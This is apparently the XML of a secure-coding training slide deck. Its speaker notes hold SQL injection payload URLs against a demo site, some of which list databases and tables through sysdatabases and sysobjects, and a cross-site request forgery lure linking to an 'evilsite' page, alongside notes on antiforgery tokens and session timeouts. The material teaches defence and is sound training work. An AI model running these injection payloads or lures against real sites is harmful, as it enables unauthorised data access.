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8" r:id="rId4"/>
    <p:sldMasterId id="2147483751" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="290" r:id="rId8"/>
    <p:sldId id="291" r:id="rId9"/>
    <p:sldId id="292" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="301" r:id="rId12"/>
    <p:sldId id="306" r:id="rId13"/>
    <p:sldId id="308" r:id="rId14"/>
    <p:sldId id="311" r:id="rId15"/>
    <p:sldId id="302" r:id="rId16"/>
    <p:sldId id="307" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="310" r:id="rId19"/>
    <p:sldId id="300" r:id="rId20"/>
    <p:sldId id="312" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="314" r:id="rId23"/>
    <p:sldId id="315" r:id="rId24"/>
    <p:sldId id="316" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="318" r:id="rId27"/>
    <p:sldId id="304" r:id="rId28"/>
    <p:sldId id="319" r:id="rId29"/>
    <p:sldId id="320" r:id="rId30"/>
    <p:sldId id="321" r:id="rId31"/>
    <p:sldId id="322" r:id="rId32"/>
    <p:sldId id="305" r:id="rId33"/>
    <p:sldId id="323" r:id="rId34"/>
    <p:sldId id="325" r:id="rId35"/>
    <p:sldId id="324" r:id="rId36"/>
    <p:sldId id="28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9E9E"/>
    <a:srgbClr val="015083"/>
    <a:srgbClr val="006241"/>
    <a:srgbClr val="BB8C61"/>
    <a:srgbClr val="4A2767"/>
    <a:srgbClr val="00154D"/>
    <a:srgbClr val="009999"/>
    <a:srgbClr val="77368A"/>
    <a:srgbClr val="698BBD"/>
    <a:srgbClr val="0088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86909" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="120" y="28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1" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="296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EC2AF175-A368-4FEE-9EC5-3EB609A727C3}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>10/09/2018</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CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2604332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http://injection.securecoding.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Product.aspx?ProductSubCategoryId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=2%20or%201=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=(SELECT name FROM master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>dbid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> =1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SELECT name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 'U' order by name OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2704136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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1697248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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2328381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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3876763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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3298213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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3803612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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3619147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Session types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Session timeouts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3593601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http://csrf.securecoding.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.evilsite.com/winner.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>status=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> win?? &amp;#x3C;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http:\\www.evilsite.com\winner.html&amp;#x3E;Click here&amp;#x3C;/a&amp;#x3E; and you&amp;#x27;re on your way!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Antiforgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> token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A77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="491687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http://csrf.securecoding.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.evilsite.com/winner.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>status=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> win?? &amp;#x3C;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http:\\www.evilsite.com\winner.html&amp;#x3E;Click here&amp;#x3C;/a&amp;#x3E; and you&amp;#x27;re on your way!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Antiforgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> token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A77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279940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http://csrf.securecoding.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.evilsite.com/winner.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>status=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> win?? &amp;#x3C;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http:\\www.evilsite.com\winner.html&amp;#x3E;Click here&amp;#x3C;/a&amp;#x3E; and you&amp;#x27;re on your way!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Antiforgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> token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A77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47235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http://injection.securecoding.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Product.aspx?ProductSubCategoryId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=2%20or%201=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=(SELECT name FROM master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>sysdatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>dbid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> =1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>http://injection.securecoding.com/Product.aspx?ProductSubCategoryId=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SELECT name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 'U' order by name OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CA77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30121144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http://csrf.securecoding.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.evilsite.com/winner.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>status=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> win?? &amp;#x3C;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http:\\www.evilsite.com\winner.html&amp;#x3E;Click here&amp;#x3C;/a&amp;#x3E; and you&amp;#x27;re on your way!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Antiforgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> token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A77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2987633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http://csrf.securecoding.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.evilsite.com/winner.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>status=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> win?? &amp;#x3C;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http:\\www.evilsite.com\winner.html&amp;#x3E;Click here&amp;#x3C;/a&amp;#x3E; and you&amp;#x27;re on your way!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Antiforgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> token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A77D5F9-D050-4DB1-A3D6-D58924ABD864}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
